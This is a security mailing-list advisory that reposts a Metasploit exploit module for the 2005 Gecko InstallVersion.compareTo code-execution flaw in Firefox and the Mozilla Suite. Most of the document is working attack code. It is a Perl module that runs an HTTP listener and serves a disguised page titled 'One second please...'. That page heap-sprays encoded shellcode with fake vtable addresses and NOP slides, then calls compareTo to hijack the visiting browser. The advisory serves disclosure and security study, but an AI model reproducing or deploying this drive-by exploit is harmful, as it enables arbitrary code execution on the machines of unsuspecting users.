[EXPL] Gecko InstallVersion.compareTo Code Execution (Exploit Metasploit)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



Gecko InstallVersion.compareTo Code Execution (Exploit Metasploit)
------------------------------------------------------------------------


SUMMARY

Attackers can cause a DoS and execute arbitrary code on Gecko based
browsers by using the Javascript function InstallVersion.compareTo with an
object instead of the supposed string.

DETAILS

Vulnerable Systems:
* Firefox version 1.0.4 and prior
* Mozilla Suite version 1.7.8 and prior
* Netscape version 8.0.2
* Netscape version 7.2

Immune Systems:
* Firefox version 1.0.5 and above
* Mozilla Suite version 1.7.9 and above

Exploit:
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::mozilla_compareto;

use strict;
use base "Msf::Exploit";
use Pex::Text;
use IO::Socket::INET;

my $advanced = { };

my $info =
{
'Name' => 'Mozilla Suite/Firefox InstallVersion->compareTo()
Code Execution',
'Version' => '$Revision: 1.3 $',
'Authors' =>
[
'Aviv Raff <avivra [at] gmail.com>',
'H D Moore <hdm [at] metasploit.com>',
],

'Description' =>
Pex::Text::Freeform(qq{
This module exploits a code execution vulnerability in the Mozilla
Suite, Mozilla Firefox, and Mozilla Thunderbird applications. This
exploit
module is a direct port of Aviv Raff's HTML PoC.
}),

'Arch' => [ 'x86' ],
'OS' => [ 'win32' ],
'Priv' => 0,

'UserOpts' =>
{
'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080 ],
'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ],
},

'Payload' =>
{
'Space' => 400,
'BadChars' => "\x00",
'Keys' => ['-bind'],
},
'Refs' =>
[
['BID', '14242'],
['OSVDB', '17968'],
['CVE', '2005-2265'],
['URL', 'http://www.mozilla.org/security/announce/mfsa2005-50.html'],
],

'DefaultTarget' => 0,
'Targets' =>
[
[ 'Mozilla Firefox < 1.0.5 for Windows', 0x12000000, 0x11C0002C,
0x1200002C, 0x1180002C ]
],

'Keys' => [ 'mozilla' ],

'DisclosureDate' => 'Jul 13 2005',
};

sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced},
@_);
return($self);
}

sub Exploit
{
my $self = shift;
my $server = IO::Socket::INET->new(
LocalHost => $self->GetVar('HTTPHOST'),
LocalPort => $self->GetVar('HTTPPORT'),
ReuseAddr => 1,
Listen => 1,
Proto => 'tcp'
);
my $client;

# Did the listener create fail?
if (not defined($server)) {
$self->PrintLine("[-] Failed to create local HTTP listener on " .
$self->GetVar('HTTPPORT'));
return;
}

my $httphost = ($self->GetVar('HTTPHOST') eq '0.0.0.0') ?
Pex::Utils::SourceIP('1.2.3.4') :
$self->GetVar('HTTPHOST');

$self->PrintLine("[*] Waiting for connections to http://";. $httphost
":". $self->GetVar('HTTPPORT') ."/");

while (defined($client = $server->accept())) {
$self->HandleHttpClient(Msf::Socket::Tcp->new_from_socket($client));
}

return;
}

sub HandleHttpClient
{
my $self = shift;
my $fd = shift;

# Set the remote host information
my ($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr);


# Read the HTTP command
my ($cmd, $url, $proto) = split / /, $fd->RecvLine(10);

$self->PrintLine("[*] HTTP Client connected from $rhost:$rport, sending
payload...");


my $content = $self->GenerateHTML();

# Transmit the HTTP response
my $req =
"HTTP/1.0 200 OK\r\n" .
"Content-Type: text/html\r\n" .
"Content-Length: " . length($content) . "\r\n" .
"Connection: close\r\n" .
"\r\n" .
$content;

my $res = $fd->Send($req);

$fd->Close();
}

sub JSUnescape {
my $self = shift;
my $data = shift;
my $code = '';

# Encode the shellcode via %u sequences for JS's unescape() function
my $idx = 0;
while ($idx < length($data) - 1) {
my $c1 = ord(substr($data, $idx, 1));
my $c2 = ord(substr($data, $idx+1, 1));
$code .= sprintf('%%u%.2x%.2x', $c2, $c1);
$idx += 2;
}

return $code;
}

sub GenerateHTML {
my $self = shift;
my $target = $self->Targets->[$self->GetVar('TARGET')];

my $shellcode =
$self->JSUnescape($self->GetVar('EncodedPayload')->Payload);
my $sprayTo = sprintf("0x%.8x", $target->[1]);
my $spraySlide1 = $self->JSUnescape(pack('V', $target->[2]));
my $spraySlide2 = $self->JSUnescape(pack('V', $target->[3]));
my $eaxAddress = sprintf("0x%.8x", $target->[4]);

my $data = qq#
<html>
<head>
<!--
Copyright (C) 2005-2006 Aviv Raff (with minor modifications by HDM
for the MSF module)
From:
http://aviv.raffon.net/2005/12/11/MozillaUnderestimateVulnerabilityYetAgainPlusOldVulnerabilityNewExploit.aspx
Greets: SkyLined, The Insider and shutdown
-->
<title>One second please...</title>
<script language="javascript">

function BodyOnLoad()
{
location.href="javascript:void (new InstallVersion());";
CrashAndBurn();
};

// The "Heap Spraying" is based on SkyLined InternetExploiter2
methodology
function CrashAndBurn()
{
// Spray up to this address
var heapSprayToAddress=$sprayTo;

// Payload - Just return..
var payLoadCode=unescape("$shellcode");

// Size of the heap blocks
var heapBlockSize=0x400000;

// Size of the payload in bytes
var payLoadSize=payLoadCode.length * 2;

// Caluclate spray slides size
var spraySlideSize=heapBlockSize-(payLoadSize+0x38); // exclude header

// Set first spray slide ("pdata") with "pvtbl" fake address -
0x11C0002C
var spraySlide1 = unescape("$spraySlide1");

spraySlide1 = getSpraySlide(spraySlide1,spraySlideSize);

var spraySlide2 = unescape("$spraySlide2"); //0x1200002C

spraySlide2 = getSpraySlide(spraySlide2,spraySlideSize);

var spraySlide3 = unescape("\%u9090\%u9090");
spraySlide3 = getSpraySlide(spraySlide3,spraySlideSize);

// Spray the heap
heapBlocks=(heapSprayToAddress-0x400000)/heapBlockSize;
//alert(spraySlide2.length); return;
memory = new Array();
for (i=0;i<heapBlocks;i++)
{
memory[i]=(i\%3==0) ? spraySlide1 + payLoadCode:
(i\%3==1) ? spraySlide2 + payLoadCode: spraySlide3 + payLoadCode;
}

// Set address to fake "pdata".
var eaxAddress = $eaxAddress;
// This was taken from shutdown's PoC in bugzilla
// struct vtbl { void (*code)(void); };
// struct data { struct vtbl *pvtbl; };
//
// struct data *pdata = (struct data *)(xxAddress & ~0x01);
// pdata->pvtbl->code(pdata);
//
(new InstallVersion).compareTo(new Number(eaxAddress >> 1));
}

function getSpraySlide(spraySlide, spraySlideSize) {
while (spraySlide.length*2<spraySlideSize)
{
spraySlide+=spraySlide;
}
spraySlide=spraySlide.substring(0,spraySlideSize/2);
return spraySlide;
}

// -->
</script>
</head>
<body onload="BodyOnLoad()">
</body>
</html>
#;
}

1;


ADDITIONAL INFORMATION

The information has been provided by <mailto:hdm@xxxxxxxxxxxxxx> H D
Moore.
The original article can be found at:
<http://metasploit.com/projects/Framework/exploits.html#mozilla_compareto>
http://metasploit.com/projects/Framework/exploits.html#mozilla_compareto



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages